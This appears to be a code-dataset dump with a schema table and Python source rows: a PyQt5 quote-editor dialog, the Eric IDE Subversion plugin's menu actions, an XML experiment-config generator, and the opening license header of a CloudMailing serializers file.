Dataset schema (one row per source file; lengths, ranges, and class counts as reported by the dataset viewer):

| Column | Type | Lengths / range / classes |
|---|---|---|
| repo_name | string | lengths 5–92 |
| path | string | lengths 4–221 |
| copies | string | 19 classes |
| size | string | lengths 4–6 |
| content | string | lengths 766–896k |
| license | string | 15 classes |
| hash | int64 | -9,223,277,421,539,062,000 to 9,223,102,107B |
| line_mean | float64 | 6.51–99.9 |
| line_max | int64 | 32–997 |
| alpha_frac | float64 | 0.25–0.96 |
| autogenerated | bool | 1 class |
| ratio | float64 | 1.5–13.6 |
| config_test | bool | 2 classes |
| has_no_keywords | bool | 2 classes |
| few_assignments | bool | 1 class |

Each record below is rendered as its metadata fields followed by the full `content` cell.
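A minimal sketch of how rows with this schema might be loaded and filtered, assuming the dump is available as a local Parquet file (here named `code_dump.parquet`, a hypothetical filename) and that the Hugging Face `datasets` library is installed; neither is specified by the dump itself:

```python
# Load the dump and keep only hand-written (non-autogenerated), non-test rows
# under a permissive license. "code_dump.parquet" is a hypothetical filename.
from datasets import load_dataset

ds = load_dataset("parquet", data_files="code_dump.parquet", split="train")

subset = ds.filter(
    lambda row: not row["autogenerated"]
    and not row["config_test"]
    and row["license"] in ("mit", "apache-2.0")
)
print(len(subset), "rows kept")
```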

---
repo_name: ax333l/QuoteBook | path: QuoteBook/editordialog.py | copies: 1 | size: 4837
content:
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'editordialog.ui'
#
# Created by: PyQt5 UI code generator 5.9.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Editor(object):
def setupUi(self, Editor):
Editor.setObjectName("Editor")
Editor.resize(400, 349)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap("./icon.ico"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
Editor.setWindowIcon(icon)
Editor.setLocale(QtCore.QLocale(QtCore.QLocale.English, QtCore.QLocale.UnitedStates))
self.gridLayout = QtWidgets.QGridLayout(Editor)
self.gridLayout.setObjectName("gridLayout")
self.editCategory = QtWidgets.QLineEdit(Editor)
self.editCategory.setObjectName("editCategory")
self.gridLayout.addWidget(self.editCategory, 2, 1, 1, 1)
self.editTitle = QtWidgets.QLineEdit(Editor)
self.editTitle.setObjectName("editTitle")
self.gridLayout.addWidget(self.editTitle, 1, 1, 1, 1)
self.editQuote = QtWidgets.QTextEdit(Editor)
self.editQuote.setObjectName("editQuote")
self.gridLayout.addWidget(self.editQuote, 0, 1, 1, 1)
self.editAuthor = QtWidgets.QLineEdit(Editor)
self.editAuthor.setObjectName("editAuthor")
self.gridLayout.addWidget(self.editAuthor, 3, 1, 1, 1)
self.label = QtWidgets.QLabel(Editor)
self.label.setObjectName("label")
self.gridLayout.addWidget(self.label, 0, 0, 1, 1, QtCore.Qt.AlignHCenter)
self.horizontalLayout_6 = QtWidgets.QHBoxLayout()
self.horizontalLayout_6.setObjectName("horizontalLayout_6")
self.btnSave = QtWidgets.QPushButton(Editor)
self.btnSave.setObjectName("btnSave")
self.horizontalLayout_6.addWidget(self.btnSave)
self.btnCancel = QtWidgets.QPushButton(Editor)
self.btnCancel.setObjectName("btnCancel")
self.horizontalLayout_6.addWidget(self.btnCancel)
self.gridLayout.addLayout(self.horizontalLayout_6, 7, 1, 1, 1)
self.label_2 = QtWidgets.QLabel(Editor)
self.label_2.setObjectName("label_2")
self.gridLayout.addWidget(self.label_2, 1, 0, 1, 1, QtCore.Qt.AlignHCenter)
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.gridLayout.addItem(spacerItem, 7, 0, 1, 1)
self.editCharacters = QtWidgets.QLineEdit(Editor)
self.editCharacters.setObjectName("editCharacters")
self.gridLayout.addWidget(self.editCharacters, 4, 1, 1, 1)
self.editDate = QtWidgets.QLineEdit(Editor)
self.editDate.setObjectName("editDate")
self.gridLayout.addWidget(self.editDate, 5, 1, 1, 1)
self.editTags = QtWidgets.QLineEdit(Editor)
self.editTags.setObjectName("editTags")
self.gridLayout.addWidget(self.editTags, 6, 1, 1, 1)
self.label_3 = QtWidgets.QLabel(Editor)
self.label_3.setObjectName("label_3")
self.gridLayout.addWidget(self.label_3, 2, 0, 1, 1, QtCore.Qt.AlignHCenter)
self.label_4 = QtWidgets.QLabel(Editor)
self.label_4.setObjectName("label_4")
self.gridLayout.addWidget(self.label_4, 3, 0, 1, 1, QtCore.Qt.AlignHCenter)
self.label_5 = QtWidgets.QLabel(Editor)
self.label_5.setObjectName("label_5")
self.gridLayout.addWidget(self.label_5, 4, 0, 1, 1, QtCore.Qt.AlignHCenter)
self.label_6 = QtWidgets.QLabel(Editor)
self.label_6.setObjectName("label_6")
self.gridLayout.addWidget(self.label_6, 5, 0, 1, 1, QtCore.Qt.AlignHCenter)
self.label_7 = QtWidgets.QLabel(Editor)
self.label_7.setObjectName("label_7")
self.gridLayout.addWidget(self.label_7, 6, 0, 1, 1, QtCore.Qt.AlignHCenter)
self.retranslateUi(Editor)
QtCore.QMetaObject.connectSlotsByName(Editor)
def retranslateUi(self, Editor):
_translate = QtCore.QCoreApplication.translate
Editor.setWindowTitle(_translate("Editor", "QuoteEdit"))
self.label.setText(_translate("Editor", "Quote"))
self.btnSave.setText(_translate("Editor", "Save"))
self.btnCancel.setText(_translate("Editor", "Cancel"))
self.label_2.setText(_translate("Editor", "Title"))
self.label_3.setText(_translate("Editor", "Category"))
self.label_4.setText(_translate("Editor", "Author"))
self.label_5.setText(_translate("Editor", "Characters"))
self.label_6.setText(_translate("Editor", "Date"))
self.label_7.setText(_translate("Editor", "Tags"))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
Editor = QtWidgets.QDialog()
ui = Ui_Editor()
ui.setupUi(Editor)
Editor.show()
sys.exit(app.exec_())
license: gpl-3.0 | hash: 1,446,403,713,159,849,200 | line_mean: 47.37 | line_max: 114 | alpha_frac: 0.674385 | autogenerated: false | ratio: 3.698012 | config_test: false | has_no_keywords: false | few_assignments: false

---
repo_name: paulmadore/Eric-IDE | path: 6-6.0.9/eric/Plugins/VcsPlugins/vcsPySvn/ProjectHelper.py | copies: 1 | size: 24920
content:
# -*- coding: utf-8 -*-
# Copyright (c) 2005 - 2015 Detlev Offenbach <detlev@die-offenbachs.de>
#
"""
Module implementing the VCS project helper for Subversion.
"""
from __future__ import unicode_literals
import os
from E5Gui.E5Application import e5App
from VCS.ProjectHelper import VcsProjectHelper
from E5Gui.E5Action import E5Action
import UI.PixmapCache
class SvnProjectHelper(VcsProjectHelper):
"""
Class implementing the VCS project helper for Subversion.
"""
def __init__(self, vcsObject, projectObject, parent=None, name=None):
"""
Constructor
@param vcsObject reference to the vcs object
@param projectObject reference to the project object
@param parent parent widget (QWidget)
@param name name of this object (string)
"""
VcsProjectHelper.__init__(self, vcsObject, projectObject, parent, name)
def getActions(self):
"""
Public method to get a list of all actions.
@return list of all actions (list of E5Action)
"""
return self.actions[:]
def initActions(self):
"""
Public method to generate the action objects.
"""
self.vcsNewAct = E5Action(
self.tr('New from repository'),
UI.PixmapCache.getIcon("vcsCheckout.png"),
self.tr('&New from repository...'), 0, 0, self,
'subversion_new')
self.vcsNewAct.setStatusTip(self.tr(
'Create a new project from the VCS repository'
))
self.vcsNewAct.setWhatsThis(self.tr(
"""<b>New from repository</b>"""
"""<p>This creates a new local project from the VCS"""
""" repository.</p>"""
))
self.vcsNewAct.triggered.connect(self._vcsCheckout)
self.actions.append(self.vcsNewAct)
self.vcsUpdateAct = E5Action(
self.tr('Update from repository'),
UI.PixmapCache.getIcon("vcsUpdate.png"),
self.tr('&Update from repository'), 0, 0, self,
'subversion_update')
self.vcsUpdateAct.setStatusTip(self.tr(
'Update the local project from the VCS repository'
))
self.vcsUpdateAct.setWhatsThis(self.tr(
"""<b>Update from repository</b>"""
"""<p>This updates the local project from the VCS"""
""" repository.</p>"""
))
self.vcsUpdateAct.triggered.connect(self._vcsUpdate)
self.actions.append(self.vcsUpdateAct)
self.vcsCommitAct = E5Action(
self.tr('Commit changes to repository'),
UI.PixmapCache.getIcon("vcsCommit.png"),
self.tr('&Commit changes to repository...'), 0, 0, self,
'subversion_commit')
self.vcsCommitAct.setStatusTip(self.tr(
'Commit changes to the local project to the VCS repository'
))
self.vcsCommitAct.setWhatsThis(self.tr(
"""<b>Commit changes to repository</b>"""
"""<p>This commits changes to the local project to the VCS"""
""" repository.</p>"""
))
self.vcsCommitAct.triggered.connect(self._vcsCommit)
self.actions.append(self.vcsCommitAct)
self.vcsLogAct = E5Action(
self.tr('Show log'),
UI.PixmapCache.getIcon("vcsLog.png"),
self.tr('Show &log'),
0, 0, self, 'subversion_log')
self.vcsLogAct.setStatusTip(self.tr(
'Show the log of the local project'
))
self.vcsLogAct.setWhatsThis(self.tr(
"""<b>Show log</b>"""
"""<p>This shows the log of the local project.</p>"""
))
self.vcsLogAct.triggered.connect(self._vcsLog)
self.actions.append(self.vcsLogAct)
self.svnLogBrowserAct = E5Action(
self.tr('Show log browser'),
UI.PixmapCache.getIcon("vcsLog.png"),
self.tr('Show log browser'),
0, 0, self, 'subversion_log_browser')
self.svnLogBrowserAct.setStatusTip(self.tr(
'Show a dialog to browse the log of the local project'
))
self.svnLogBrowserAct.setWhatsThis(self.tr(
"""<b>Show log browser</b>"""
"""<p>This shows a dialog to browse the log of the local"""
""" project. A limited number of entries is shown first. More"""
""" can be retrieved later on.</p>"""
))
self.svnLogBrowserAct.triggered.connect(self._vcsLogBrowser)
self.actions.append(self.svnLogBrowserAct)
self.vcsDiffAct = E5Action(
self.tr('Show differences'),
UI.PixmapCache.getIcon("vcsDiff.png"),
self.tr('Show &difference'),
0, 0, self, 'subversion_diff')
self.vcsDiffAct.setStatusTip(self.tr(
'Show the difference of the local project to the repository'
))
self.vcsDiffAct.setWhatsThis(self.tr(
"""<b>Show differences</b>"""
"""<p>This shows differences of the local project to the"""
""" repository.</p>"""
))
self.vcsDiffAct.triggered.connect(self._vcsDiff)
self.actions.append(self.vcsDiffAct)
self.svnExtDiffAct = E5Action(
self.tr('Show differences (extended)'),
UI.PixmapCache.getIcon("vcsDiff.png"),
self.tr('Show differences (extended)'),
0, 0, self, 'subversion_extendeddiff')
self.svnExtDiffAct.setStatusTip(self.tr(
'Show the difference of revisions of the project to the repository'
))
self.svnExtDiffAct.setWhatsThis(self.tr(
"""<b>Show differences (extended)</b>"""
"""<p>This shows differences of selectable revisions of"""
""" the project.</p>"""
))
self.svnExtDiffAct.triggered.connect(self.__svnExtendedDiff)
self.actions.append(self.svnExtDiffAct)
self.svnUrlDiffAct = E5Action(
self.tr('Show differences (URLs)'),
UI.PixmapCache.getIcon("vcsDiff.png"),
self.tr('Show differences (URLs)'),
0, 0, self, 'subversion_urldiff')
self.svnUrlDiffAct.setStatusTip(self.tr(
'Show the difference of the project between two repository URLs'
))
self.svnUrlDiffAct.setWhatsThis(self.tr(
"""<b>Show differences (URLs)</b>"""
"""<p>This shows differences of the project between"""
""" two repository URLs.</p>"""
))
self.svnUrlDiffAct.triggered.connect(self.__svnUrlDiff)
self.actions.append(self.svnUrlDiffAct)
self.vcsStatusAct = E5Action(
self.tr('Show status'),
UI.PixmapCache.getIcon("vcsStatus.png"),
self.tr('Show &status'),
0, 0, self, 'subversion_status')
self.vcsStatusAct.setStatusTip(self.tr(
'Show the status of the local project'
))
self.vcsStatusAct.setWhatsThis(self.tr(
"""<b>Show status</b>"""
"""<p>This shows the status of the local project.</p>"""
))
self.vcsStatusAct.triggered.connect(self._vcsStatus)
self.actions.append(self.vcsStatusAct)
self.svnChangeListsAct = E5Action(
self.tr('Show change lists'),
UI.PixmapCache.getIcon("vcsChangeLists.png"),
self.tr('Show change lists'),
0, 0, self, 'subversion_changelists')
self.svnChangeListsAct.setStatusTip(self.tr(
'Show the change lists and associated files of the local project'
))
self.svnChangeListsAct.setWhatsThis(self.tr(
"""<b>Show change lists</b>"""
"""<p>This shows the change lists and associated files of the"""
""" local project.</p>"""
))
self.svnChangeListsAct.triggered.connect(self.__svnChangeLists)
self.actions.append(self.svnChangeListsAct)
self.svnRepoInfoAct = E5Action(
self.tr('Show repository info'),
UI.PixmapCache.getIcon("vcsRepo.png"),
self.tr('Show repository info'),
0, 0, self, 'subversion_repoinfo')
self.svnRepoInfoAct.setStatusTip(self.tr(
'Show some repository related information for the local project'
))
self.svnRepoInfoAct.setWhatsThis(self.tr(
"""<b>Show repository info</b>"""
"""<p>This shows some repository related information for"""
""" the local project.</p>"""
))
self.svnRepoInfoAct.triggered.connect(self.__svnInfo)
self.actions.append(self.svnRepoInfoAct)
self.vcsTagAct = E5Action(
self.tr('Tag in repository'),
UI.PixmapCache.getIcon("vcsTag.png"),
self.tr('&Tag in repository...'),
0, 0, self, 'subversion_tag')
self.vcsTagAct.setStatusTip(self.tr(
'Tag the local project in the repository'
))
self.vcsTagAct.setWhatsThis(self.tr(
"""<b>Tag in repository</b>"""
"""<p>This tags the local project in the repository.</p>"""
))
self.vcsTagAct.triggered.connect(self._vcsTag)
self.actions.append(self.vcsTagAct)
self.vcsExportAct = E5Action(
self.tr('Export from repository'),
UI.PixmapCache.getIcon("vcsExport.png"),
self.tr('&Export from repository...'),
0, 0, self, 'subversion_export')
self.vcsExportAct.setStatusTip(self.tr(
'Export a project from the repository'
))
self.vcsExportAct.setWhatsThis(self.tr(
"""<b>Export from repository</b>"""
"""<p>This exports a project from the repository.</p>"""
))
self.vcsExportAct.triggered.connect(self._vcsExport)
self.actions.append(self.vcsExportAct)
self.vcsPropsAct = E5Action(
self.tr('Command options'),
self.tr('Command &options...'), 0, 0, self,
'subversion_options')
self.vcsPropsAct.setStatusTip(self.tr(
'Show the VCS command options'))
self.vcsPropsAct.setWhatsThis(self.tr(
"""<b>Command options...</b>"""
"""<p>This shows a dialog to edit the VCS command options.</p>"""
))
self.vcsPropsAct.triggered.connect(self._vcsCommandOptions)
self.actions.append(self.vcsPropsAct)
self.vcsRevertAct = E5Action(
self.tr('Revert changes'),
UI.PixmapCache.getIcon("vcsRevert.png"),
self.tr('Re&vert changes'),
0, 0, self, 'subversion_revert')
self.vcsRevertAct.setStatusTip(self.tr(
'Revert all changes made to the local project'
))
self.vcsRevertAct.setWhatsThis(self.tr(
"""<b>Revert changes</b>"""
"""<p>This reverts all changes made to the local project.</p>"""
))
self.vcsRevertAct.triggered.connect(self._vcsRevert)
self.actions.append(self.vcsRevertAct)
self.vcsMergeAct = E5Action(
self.tr('Merge'),
UI.PixmapCache.getIcon("vcsMerge.png"),
self.tr('Mer&ge changes...'),
0, 0, self, 'subversion_merge')
self.vcsMergeAct.setStatusTip(self.tr(
'Merge changes of a tag/revision into the local project'
))
self.vcsMergeAct.setWhatsThis(self.tr(
"""<b>Merge</b>"""
"""<p>This merges changes of a tag/revision into the local"""
""" project.</p>"""
))
self.vcsMergeAct.triggered.connect(self._vcsMerge)
self.actions.append(self.vcsMergeAct)
self.vcsSwitchAct = E5Action(
self.tr('Switch'),
UI.PixmapCache.getIcon("vcsSwitch.png"),
self.tr('S&witch...'),
0, 0, self, 'subversion_switch')
self.vcsSwitchAct.setStatusTip(self.tr(
'Switch the local copy to another tag/branch'
))
self.vcsSwitchAct.setWhatsThis(self.tr(
"""<b>Switch</b>"""
"""<p>This switches the local copy to another tag/branch.</p>"""
))
self.vcsSwitchAct.triggered.connect(self._vcsSwitch)
self.actions.append(self.vcsSwitchAct)
self.vcsResolveAct = E5Action(
self.tr('Conflicts resolved'),
self.tr('Con&flicts resolved'),
0, 0, self, 'subversion_resolve')
self.vcsResolveAct.setStatusTip(self.tr(
'Mark all conflicts of the local project as resolved'
))
self.vcsResolveAct.setWhatsThis(self.tr(
"""<b>Conflicts resolved</b>"""
"""<p>This marks all conflicts of the local project as"""
""" resolved.</p>"""
))
self.vcsResolveAct.triggered.connect(self.__svnResolve)
self.actions.append(self.vcsResolveAct)
self.vcsCleanupAct = E5Action(
self.tr('Cleanup'),
self.tr('Cleanu&p'),
0, 0, self, 'subversion_cleanup')
self.vcsCleanupAct.setStatusTip(self.tr(
'Cleanup the local project'
))
self.vcsCleanupAct.setWhatsThis(self.tr(
"""<b>Cleanup</b>"""
"""<p>This performs a cleanup of the local project.</p>"""
))
self.vcsCleanupAct.triggered.connect(self._vcsCleanup)
self.actions.append(self.vcsCleanupAct)
self.vcsCommandAct = E5Action(
self.tr('Execute command'),
self.tr('E&xecute command...'),
0, 0, self, 'subversion_command')
self.vcsCommandAct.setStatusTip(self.tr(
'Execute an arbitrary VCS command'
))
self.vcsCommandAct.setWhatsThis(self.tr(
"""<b>Execute command</b>"""
"""<p>This opens a dialog to enter an arbitrary VCS command.</p>"""
))
self.vcsCommandAct.triggered.connect(self._vcsCommand)
self.actions.append(self.vcsCommandAct)
self.svnTagListAct = E5Action(
self.tr('List tags'),
self.tr('List tags...'),
0, 0, self, 'subversion_list_tags')
self.svnTagListAct.setStatusTip(self.tr(
'List tags of the project'
))
self.svnTagListAct.setWhatsThis(self.tr(
"""<b>List tags</b>"""
"""<p>This lists the tags of the project.</p>"""
))
self.svnTagListAct.triggered.connect(self.__svnTagList)
self.actions.append(self.svnTagListAct)
self.svnBranchListAct = E5Action(
self.tr('List branches'),
self.tr('List branches...'),
0, 0, self, 'subversion_list_branches')
self.svnBranchListAct.setStatusTip(self.tr(
'List branches of the project'
))
self.svnBranchListAct.setWhatsThis(self.tr(
"""<b>List branches</b>"""
"""<p>This lists the branches of the project.</p>"""
))
self.svnBranchListAct.triggered.connect(self.__svnBranchList)
self.actions.append(self.svnBranchListAct)
self.svnListAct = E5Action(
self.tr('List repository contents'),
self.tr('List repository contents...'),
0, 0, self, 'subversion_contents')
self.svnListAct.setStatusTip(self.tr(
'Lists the contents of the repository'
))
self.svnListAct.setWhatsThis(self.tr(
"""<b>List repository contents</b>"""
"""<p>This lists the contents of the repository.</p>"""
))
self.svnListAct.triggered.connect(self.__svnTagList)
self.actions.append(self.svnListAct)
self.svnPropSetAct = E5Action(
self.tr('Set Property'),
self.tr('Set Property...'),
0, 0, self, 'subversion_property_set')
self.svnPropSetAct.setStatusTip(self.tr(
'Set a property for the project files'
))
self.svnPropSetAct.setWhatsThis(self.tr(
"""<b>Set Property</b>"""
"""<p>This sets a property for the project files.</p>"""
))
self.svnPropSetAct.triggered.connect(self.__svnPropSet)
self.actions.append(self.svnPropSetAct)
self.svnPropListAct = E5Action(
self.tr('List Properties'),
self.tr('List Properties...'),
0, 0, self, 'subversion_property_list')
self.svnPropListAct.setStatusTip(self.tr(
'List properties of the project files'
))
self.svnPropListAct.setWhatsThis(self.tr(
"""<b>List Properties</b>"""
"""<p>This lists the properties of the project files.</p>"""
))
self.svnPropListAct.triggered.connect(self.__svnPropList)
self.actions.append(self.svnPropListAct)
self.svnPropDelAct = E5Action(
self.tr('Delete Property'),
self.tr('Delete Property...'),
0, 0, self, 'subversion_property_delete')
self.svnPropDelAct.setStatusTip(self.tr(
'Delete a property for the project files'
))
self.svnPropDelAct.setWhatsThis(self.tr(
"""<b>Delete Property</b>"""
"""<p>This deletes a property for the project files.</p>"""
))
self.svnPropDelAct.triggered.connect(self.__svnPropDel)
self.actions.append(self.svnPropDelAct)
self.svnRelocateAct = E5Action(
self.tr('Relocate'),
UI.PixmapCache.getIcon("vcsSwitch.png"),
self.tr('Relocate...'),
0, 0, self, 'subversion_relocate')
self.svnRelocateAct.setStatusTip(self.tr(
'Relocate the working copy to a new repository URL'
))
self.svnRelocateAct.setWhatsThis(self.tr(
"""<b>Relocate</b>"""
"""<p>This relocates the working copy to a new repository"""
""" URL.</p>"""
))
self.svnRelocateAct.triggered.connect(self.__svnRelocate)
self.actions.append(self.svnRelocateAct)
self.svnRepoBrowserAct = E5Action(
self.tr('Repository Browser'),
UI.PixmapCache.getIcon("vcsRepoBrowser.png"),
self.tr('Repository Browser...'),
0, 0, self, 'subversion_repo_browser')
self.svnRepoBrowserAct.setStatusTip(self.tr(
'Show the Repository Browser dialog'
))
self.svnRepoBrowserAct.setWhatsThis(self.tr(
"""<b>Repository Browser</b>"""
"""<p>This shows the Repository Browser dialog.</p>"""
))
self.svnRepoBrowserAct.triggered.connect(self.__svnRepoBrowser)
self.actions.append(self.svnRepoBrowserAct)
self.svnConfigAct = E5Action(
self.tr('Configure'),
self.tr('Configure...'),
0, 0, self, 'subversion_configure')
self.svnConfigAct.setStatusTip(self.tr(
'Show the configuration dialog with the Subversion page selected'
))
self.svnConfigAct.setWhatsThis(self.tr(
"""<b>Configure</b>"""
"""<p>Show the configuration dialog with the Subversion page"""
""" selected.</p>"""
))
self.svnConfigAct.triggered.connect(self.__svnConfigure)
self.actions.append(self.svnConfigAct)
self.svnUpgradeAct = E5Action(
self.tr('Upgrade'),
self.tr('Upgrade...'),
0, 0, self, 'subversion_upgrade')
self.svnUpgradeAct.setStatusTip(self.tr(
'Upgrade the working copy to the current format'
))
self.svnUpgradeAct.setWhatsThis(self.tr(
"""<b>Upgrade</b>"""
"""<p>Upgrades the working copy to the current format.</p>"""
))
self.svnUpgradeAct.triggered.connect(self.__svnUpgrade)
self.actions.append(self.svnUpgradeAct)
def initMenu(self, menu):
"""
Public method to generate the VCS menu.
@param menu reference to the menu to be populated (QMenu)
"""
menu.clear()
act = menu.addAction(
UI.PixmapCache.getIcon(
os.path.join("VcsPlugins", "vcsPySvn", "icons", "pysvn.png")),
self.vcs.vcsName(), self._vcsInfoDisplay)
font = act.font()
font.setBold(True)
act.setFont(font)
menu.addSeparator()
menu.addAction(self.vcsUpdateAct)
menu.addAction(self.vcsCommitAct)
menu.addSeparator()
menu.addAction(self.vcsNewAct)
menu.addAction(self.vcsExportAct)
menu.addSeparator()
menu.addAction(self.vcsTagAct)
if self.vcs.otherData["standardLayout"]:
menu.addAction(self.svnTagListAct)
menu.addAction(self.svnBranchListAct)
else:
menu.addAction(self.svnListAct)
menu.addSeparator()
menu.addAction(self.vcsLogAct)
menu.addAction(self.svnLogBrowserAct)
menu.addSeparator()
menu.addAction(self.vcsStatusAct)
menu.addAction(self.svnChangeListsAct)
menu.addAction(self.svnRepoInfoAct)
menu.addSeparator()
menu.addAction(self.vcsDiffAct)
menu.addAction(self.svnExtDiffAct)
menu.addAction(self.svnUrlDiffAct)
menu.addSeparator()
menu.addAction(self.vcsRevertAct)
menu.addAction(self.vcsMergeAct)
menu.addAction(self.vcsResolveAct)
menu.addSeparator()
menu.addAction(self.vcsSwitchAct)
menu.addAction(self.svnRelocateAct)
menu.addSeparator()
menu.addAction(self.svnPropSetAct)
menu.addAction(self.svnPropListAct)
menu.addAction(self.svnPropDelAct)
menu.addSeparator()
menu.addAction(self.vcsCleanupAct)
menu.addSeparator()
menu.addAction(self.vcsCommandAct)
menu.addAction(self.svnRepoBrowserAct)
menu.addAction(self.svnUpgradeAct)
menu.addSeparator()
menu.addAction(self.vcsPropsAct)
menu.addSeparator()
menu.addAction(self.svnConfigAct)
def __svnResolve(self):
"""
Private slot used to resolve conflicts of the local project.
"""
self.vcs.svnResolve(self.project.ppath)
def __svnPropList(self):
"""
Private slot used to list the properties of the project files.
"""
self.vcs.svnListProps(self.project.ppath, True)
def __svnPropSet(self):
"""
Private slot used to set a property for the project files.
"""
self.vcs.svnSetProp(self.project.ppath, True)
def __svnPropDel(self):
"""
Private slot used to delete a property for the project files.
"""
self.vcs.svnDelProp(self.project.ppath, True)
def __svnTagList(self):
"""
Private slot used to list the tags of the project.
"""
self.vcs.svnListTagBranch(self.project.ppath, True)
def __svnBranchList(self):
"""
Private slot used to list the branches of the project.
"""
self.vcs.svnListTagBranch(self.project.ppath, False)
def __svnExtendedDiff(self):
"""
Private slot used to perform a svn diff with the selection of
revisions.
"""
self.vcs.svnExtendedDiff(self.project.ppath)
def __svnUrlDiff(self):
"""
Private slot used to perform a svn diff with the selection of
repository URLs.
"""
self.vcs.svnUrlDiff(self.project.ppath)
def __svnInfo(self):
"""
Private slot used to show repository information for the local project.
"""
self.vcs.svnInfo(self.project.ppath, ".")
def __svnRelocate(self):
"""
Private slot used to relocate the working copy to a new repository URL.
"""
self.vcs.svnRelocate(self.project.ppath)
def __svnRepoBrowser(self):
"""
Private slot to open the repository browser.
"""
self.vcs.svnRepoBrowser(projectPath=self.project.ppath)
def __svnConfigure(self):
"""
Private slot to open the configuration dialog.
"""
e5App().getObject("UserInterface")\
.showPreferences("zzz_subversionPage")
def __svnChangeLists(self):
"""
Private slot used to show a list of change lists.
"""
self.vcs.svnShowChangelists(self.project.ppath)
def __svnUpgrade(self):
"""
Private slot used to upgrade the working copy format.
"""
self.vcs.svnUpgrade(self.project.ppath)
license: gpl-3.0 | hash: 8,645,574,378,206,538,000 | line_mean: 37.45679 | line_max: 79 | alpha_frac: 0.577127 | autogenerated: false | ratio: 4.069236 | config_test: true | has_no_keywords: false | few_assignments: false

---
repo_name: lpouillo/execo-g5k-tools | path: engines/simgrid_paasage/xml_gen_execo.py | copies: 1 | size: 5079
content:
import xml.etree.cElementTree as ET # that 'c' in "...etree.cElement..."
# means the package is a C implementation; it runs 15-20 times faster
# than the equivalent pure-Python implementation
import xml.dom.minidom as DOM
import shutil
import lxml.etree as le
import re
import itertools
from optparse import OptionParser
def initXML():
root = ET.Element("nTierApplication")
root.set("version", "1")
ami = ET.SubElement(root, "AMI")
field1 = ET.SubElement(ami, "webService")
field1.set("size", "10000000000.0")
field2 = ET.SubElement(ami, "appsService")
field2.set("size", "10000000000.0")
field3 = ET.SubElement(ami, "dbService")
field3.set("size", "10000000000.0")
field4 = ET.SubElement(ami, "webProxy")
field4.set("size", "10000000000.0")
field5 = ET.SubElement(ami, "appsProxy")
field5.set("size", "10000000000.0")
field6 = ET.SubElement(ami, "dbProxy")
field6.set("size", "10000000000.0")
proxy = ET.SubElement(root, "proxy")
field7 = ET.SubElement(proxy, "webProxy")
field7.set("region", "eu_1")
field7.set("instanceType","m1.small")
field8 = ET.SubElement(proxy, "appsProxy")
field8.set("region", "eu_1")
field8.set("instanceType","m1.small")
field9 = ET.SubElement(proxy, "dbProxy")
field9.set("region", "eu_1")
field9.set("instanceType","m1.small")
return root
def createService(parent, name):
tmp = ET.SubElement(parent, name)
return tmp
def createRegion(parent, name):
tmp = ET.SubElement(parent, "region")
tmp.set("name", name )
return tmp
def createInstance(parent, ty, qt):
tmp = ET.SubElement(parent, "instance")
tmp.set("quantity", qt )
tmp.set("type", ty )
return tmp
def generateExp(comb_str, lis, rootSrc):
root=initXML()
servParent=ET.SubElement(root, "services")
servWeb=createService(servParent,"webService")
servApp=createService(servParent,"appsService")
servDb=createService(servParent,"dbService")
i=0
web = rootSrc.find("webService")
    if web is None:
        print "ERROR: webService tag not found!"
        exit(1)
for child1 in web.iter("region"):
regionTmp=createRegion(servWeb, child1.get("name"))
for child2 in child1.iter("instance"):
if (lis[child2.get("type")] != '0'):
createInstance(regionTmp, child2.get("type"), lis[child2.get("type")])
else:
continue
if not regionTmp.getchildren():
servWeb.remove(regionTmp)
    if not servWeb.getchildren():
        print "ERROR: Web service does not have any VM instance associated for the first experiment"
        exit(2)
    app = rootSrc.find("appsService")
    if app is None:
        print "ERROR: appsService tag not found!"
        exit(1)
for child1 in app.iter("region"):
regionTmp=createRegion(servApp, child1.get("name"))
for child2 in child1.iter("instance"):
if (lis[child2.get("type")] != '0'):
createInstance(regionTmp, child2.get("type"), lis[child2.get("type")])
else:
continue
if not regionTmp.getchildren():
servApp.remove(regionTmp)
    if not servApp.getchildren():
        print "ERROR: Apps service does not have any VM instance associated for the first experiment"
        exit(2)
    db = rootSrc.find("dbService")
    if db is None:
        print "ERROR: dbService tag not found!"
        exit(1)
for child1 in db.iter("region"):
regionTmp=createRegion(servDb, child1.get("name"))
for child2 in child1.iter("instance"):
if (lis[child2.get("type")] != '0'):
createInstance(regionTmp, child2.get("type"), lis[child2.get("type")])
else:
continue
if not regionTmp.getchildren():
servDb.remove(regionTmp)
    if not servDb.getchildren():
        print "ERROR: Db service does not have any VM instance associated for the first experiment"
        exit(2)
xml_string=ET.tostring(root, encoding='utf8', method='xml')
xml = DOM.parseString(xml_string)
pretty_xml_as_string = xml.toprettyxml()
outFile=open("exp_"+comb_str+".xml", "w")
outFile.write(pretty_xml_as_string)
def create_dict(comb_list):
res_dict=dict()
length=len(comb_list)-1
for i in drange(0,length,2):
res_dict[comb_list[i]]=comb_list[i+1]
return res_dict
def drange(start, stop, step):
r = start
while r < stop:
yield r
r += step
if __name__ == "__main__":
tree = ET.parse("conf.xml")
rootSrc = tree.getroot()
usage = "usage: %prog [options] [args] "
parser = OptionParser(usage=usage)
parser.add_option("--cb", dest="comb", help="current combination")
(options, args) = parser.parse_args()
if not (options.comb):
parser.error("You must provide parameters for the experiment !")
param_dict=create_dict(options.comb.split("_"))
generateExp(options.comb, param_dict, rootSrc)
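# A hypothetical invocation sketch (the exact instance-type names come from
# conf.xml, which is not shown here): the --cb string is split on "_" and
# consumed pairwise as {type: quantity} by create_dict(), e.g.
#   ./xml_gen_execo.py --cb m1.small_2_m1.large_1
# would request 2 "m1.small" and 1 "m1.large" instances per matching region.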
license: gpl-3.0 | hash: -9,222,059,549,375,971,000 | line_mean: 28.52907 | line_max: 100 | alpha_frac: 0.617051 | autogenerated: false | ratio: 3.445726 | config_test: false | has_no_keywords: false | few_assignments: false

---
repo_name: ricard33/cloud-mailing | path: cloud_mailing/master/serializers.py | copies: 1 | size: 11463
content:
# Copyright 2015-2019 Cedric RICARD
#
# This file is part of CloudMailing.
#
# CloudMailing is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# CloudMailing is distributed in the hope that it will be useful,
